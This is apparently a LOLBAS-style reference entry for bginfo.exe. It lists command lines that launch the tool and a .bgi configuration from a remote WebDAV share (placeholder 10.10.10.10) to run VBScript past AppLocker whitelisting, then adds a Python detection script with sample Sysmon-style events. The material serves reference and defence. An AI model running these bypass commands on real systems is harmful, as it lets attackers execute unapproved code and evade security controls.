## Bginfo.exe
* Functions: Execute

```
bginfo.exe bginfo.bgi /popup /nolicprompt

"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt

"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
```

Acknowledgements:

* Oddvar Moe - @oddvarmoe

Code sample:

* https://github.com/api0cradle/BGInfo/blob/master/BGITool_1.0.ps1

Resources:

* https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
* https://oddvar.moe/2017/05/22/clarification-bginfo-4-22-applocker-still-vulnerable/
* https://twitter.com/Oddvarmoe/status/865330067630694400
* https://twitter.com/ItsReallyNick/status/996133093613424641
* https://github.com/3gstudent/bgi-creater
* https://pentestlab.blog/2017/06/05/applocker-bypass-bginfo/

Full path:

```
No fixed path
```

Notes:

Used to set background image in Windows with details about the environment.

Detection:

Bginfo.exe requesting files externally or running VBS scripts.
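The detection hint above is terse, so here is an added example of how a defender could turn it into a rule. It is not part of this entry or of any project listed here: it scans constructed process-creation and network-connection records in the general shape of Sysmon Event ID 1 and 3 (field names `Image`, `OriginalFileName`, `CommandLine`, `DestinationIp`, `DestinationPort` and the `event` tag are assumptions for illustration), flags bginfo.exe launched from a network path, a remote `.bgi` or other UNC/URL resource on its command line, a renamed copy, and any network connection the process opens. The `allowed_prefixes` allowlist stands in for a site's known deployment share so a legitimate push of a `.bgi` file is not reported.

```python
"""Added example, not from the original entry: flag suspicious bginfo.exe use
in constructed Sysmon-style process-creation / network-connection records."""
import re

BGINFO = "bginfo.exe"
# A UNC path (\\host\share\...) or an http(s) URL on the command line.
UNC_PATH = re.compile(r'\\\\[^\\\s"]+\\[^\s"]+')
URL = re.compile(r'https?://[^\s"]+', re.IGNORECASE)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _is_bginfo(ev):
    # Match on the on-disk name or on the PE's OriginalFileName, so a renamed
    # copy is still recognised (Sysmon Event ID 1 records both fields).
    return (_basename(ev.get("Image", "")) == BGINFO
            or ev.get("OriginalFileName", "").lower() == BGINFO)


def _allowed(resource, allowed_prefixes):
    r = resource.lower()
    return any(r.startswith(p.lower()) for p in allowed_prefixes)


def classify_process(ev, allowed_prefixes=()):
    """Return the reasons a process-creation record is suspicious ([] if none)."""
    if not _is_bginfo(ev):
        return []
    image, cmd = ev.get("Image", ""), ev.get("CommandLine", "")
    reasons = []
    if image.startswith("\\\\") and not _allowed(image, allowed_prefixes):
        reasons.append("bginfo.exe executed from a network path")
    if _basename(image) != BGINFO:
        reasons.append("bginfo.exe running under another file name")
    for res in UNC_PATH.findall(cmd) + URL.findall(cmd):
        if res.lower() == image.lower():
            continue  # the image path itself, already judged above
        if not _allowed(res, allowed_prefixes):
            reasons.append(f"remote resource on command line: {res}")
    return reasons


def classify_network(ev):
    """Any outbound connection by bginfo.exe is worth a look: its normal job is local."""
    if not _is_bginfo(ev):
        return []
    return [f"bginfo.exe connected to {ev.get('DestinationIp')}:{ev.get('DestinationPort')}"]


def scan(events, allowed_prefixes=()):
    """Return [(event id, [reasons]), ...] for every record that triggers."""
    findings = []
    for ev in events:
        if ev.get("event") == "process_create":
            reasons = classify_process(ev, allowed_prefixes)
        elif ev.get("event") == "network_connect":
            reasons = classify_network(ev)
        else:
            reasons = []
        if reasons:
            findings.append((ev.get("id"), reasons))
    return findings


# Constructed sample records (not real telemetry). Events 2 and 3 reuse the
# command lines shown in this entry; event 5 is a hypothetical sanctioned
# deployment from an internal share; 10.10.10.10 is the entry's own placeholder.
SAMPLE_EVENTS = [
    {"id": 1, "event": "process_create", "Image": r"C:\Tools\bginfo.exe",
     "OriginalFileName": "bginfo.exe", "CommandLine": r"bginfo.exe bginfo.bgi /timer:0"},
    {"id": 2, "event": "process_create", "Image": r"\\10.10.10.10\webdav\bginfo.exe",
     "OriginalFileName": "bginfo.exe",
     "CommandLine": r'"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt'},
    {"id": 3, "event": "process_create", "Image": r"\\live.sysinternals.com\Tools\bginfo.exe",
     "OriginalFileName": "bginfo.exe",
     "CommandLine": r'"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt'},
    {"id": 4, "event": "network_connect", "Image": r"C:\Tools\bginfo.exe",
     "DestinationIp": "10.10.10.10", "DestinationPort": 80},
    {"id": 5, "event": "process_create", "Image": r"\\corp-fs01\deploy\bginfo.exe",
     "OriginalFileName": "bginfo.exe",
     "CommandLine": r'"\\corp-fs01\deploy\bginfo.exe" \\corp-fs01\deploy\corp.bgi /timer:0'},
]

if __name__ == "__main__":
    for event_id, reasons in scan(SAMPLE_EVENTS, allowed_prefixes=(r"\\corp-fs01\deploy",)):
        print(event_id, "; ".join(reasons))
```

With the allowlist set, events 2, 3 and 4 are reported and the local run (1) and the sanctioned share (5) are not; run without an allowlist, event 5 is reported too, which is the tuning decision a SOC has to make per environment. The rule does not try to see the VBScript that a `.bgi` file carries, since BGInfo runs it inside its own process rather than by spawning a script host; reaching that requires inspecting the `.bgi` file itself.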